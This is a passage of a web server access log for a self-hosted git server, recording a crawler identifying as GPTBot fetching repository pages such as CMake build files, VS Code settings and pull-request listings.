"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14600] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10003] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10305] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9937] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:16:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13709] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 11904] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11570] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" +[17/Feb/2026:16:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9937] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9936] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9940] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:53:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:53:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:16:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10007] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:16:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10712] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json?display=source" [Client 74.7.227.38] [Length 11314] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" +[17/Feb/2026:16:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12013] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query" +[17/Feb/2026:16:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12013] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12011] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12011] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12010] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" +[17/Feb/2026:16:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr 